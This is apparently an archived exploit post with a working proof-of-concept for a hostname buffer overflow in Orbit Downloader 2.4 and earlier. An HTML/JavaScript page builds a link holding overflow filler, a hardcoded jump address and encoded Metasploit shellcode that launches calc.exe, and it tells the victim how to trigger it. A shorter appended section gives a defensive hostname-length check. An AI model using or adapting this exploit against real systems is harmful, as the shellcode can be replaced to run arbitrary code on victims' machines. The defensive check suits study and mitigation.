
Orbit <= 2.4 Long Hostname Remote Buffer Overflow Exploit


(omitted)
<html>
<body>

Orbit <=2.4 Long Hostname Buffer Overflow Vulnerability Poc<br />
Vulnerability discovered by Secunia<br />
Exploit and POC provided by: JavaGuru<br />
<br />
Right click on link below then choose download by orbit, CALC.EXE will pop up<br />
<br />
I got a lot of problems when trying to execute shellcode, because a lot of chars<br />
were forbidden and I was not able to execute shellcode.<br />
After playing a little I found out the solution.<br />
<br />
Don't forget, open this HTML in Firefox
<br />
Check it out.<br />
<br />
Any questions/comments: JavaGuru1999@yahoo.de<br />
<br />
<script language="JavaScript">
var tmp = "http://";

for (var i = 0; i < 508; i++) tmp += "o";

// jmp esp from kernel32.dll XP SP 3 English
//
tmp += "{F?|";

// some nops
tmp += "????";

// win32_exec - EXITFUNC=process CMD=calc.exe Size=424 Encoder=Alpha2 http://metasploit.com
// forbidden chars - 0x00 0x01 0x02 0x03
tmp += "?YYYY?YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY?????7IIIIIIIIIIIIIIIIIQZjgXP0B1ABkBAw2BB2AA0AAXBP8BBum9IlKX74C030wpnksuUlnkalfePxTAJOlKboVxLKQOEpUQzK1Ynk6TLKS1jNEaO0Z9LlndIP44UWjaKzfm5QkrjKl4UkADDdvdsEZELKsoWTGqjK0flKtL0KlKSo7lGqZKnkwllK4AJKK9QLDdTDzc7AO0AtlKCpvPLEO00xfllK70dLlK0peLlmLKCX6hxkuYnkopNPUPUPUPNku8UlCoFQyfcPpVLIl8k3o0ak2pqxankhzBCCqxZ8kNmZvnpWiom7rCU10lpcvNperXPes0g";

// Filename (not important)
tmp += "/a.rar";

// Write link for download for orbit!
document.write('<a href="' + tmp + '">Right click, then choose download with orbit</a>');


</script>
</body>
</html>

[2009-02-27]
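
A defensive check for the input this PoC relies on, as an added example that is not part of the original post or of Orbit's code: it measures the raw host part of a link against the DNS limits (253 characters per name, 63 per label) before the link is handed to a download client. The function names and sample links are constructed for illustration.

```javascript
// Added example (not from the original post). DNS limits per RFC 1035.
const MAX_HOSTNAME = 253; // whole name
const MAX_LABEL = 63;     // each dot-separated label

// Take the host straight from the raw string, without URL normalisation,
// so an oversized value is measured exactly as the client would receive it.
function rawHost(link) {
  const m = /^[a-z][a-z0-9+.-]*:\/\/([^\/?#]*)/i.exec(link);
  if (!m) return null;
  let authority = m[1];
  const at = authority.lastIndexOf("@");      // strip userinfo
  if (at !== -1) authority = authority.slice(at + 1);
  if (authority.startsWith("[")) {            // IPv6 literal, keep brackets
    const end = authority.indexOf("]");
    return end === -1 ? authority : authority.slice(0, end + 1);
  }
  const colon = authority.lastIndexOf(":");   // strip port
  return colon === -1 ? authority : authority.slice(0, colon);
}

// Returns { ok, host, reasons }; reasons lists every limit the host breaks.
function checkHostname(link) {
  const host = rawHost(link);
  if (host === null) return { ok: false, host, reasons: ["no scheme://host"] };
  const reasons = [];
  if (host.length === 0) reasons.push("empty host");
  if (host.length > MAX_HOSTNAME)
    reasons.push(`host length ${host.length} > ${MAX_HOSTNAME}`);
  if (!host.startsWith("[")) {
    const longest = Math.max(...host.split(".").map((l) => l.length));
    if (longest > MAX_LABEL)
      reasons.push(`label length ${longest} > ${MAX_LABEL}`);
    if (/[^a-z0-9.-]/i.test(host))
      reasons.push("character outside letters, digits, hyphen, dot");
  }
  return { ok: reasons.length === 0, host, reasons };
}

// Constructed sample links; the second mirrors the 508-character filler in the PoC.
const samples = [
  "http://example.com/a.rar",
  "http://" + "o".repeat(508) + "/a.rar",
  "http://user@" + "a".repeat(64) + ".example:8080/a.rar",
];
for (const s of samples) {
  const r = checkHostname(s);
  console.log(r.ok ? "allow" : "block", s.slice(0, 40), r.reasons.join("; "));
}
```

The length test is the one that matters here: an alphanumeric-encoded payload passes any character filter, but it cannot fit inside a 63-character label.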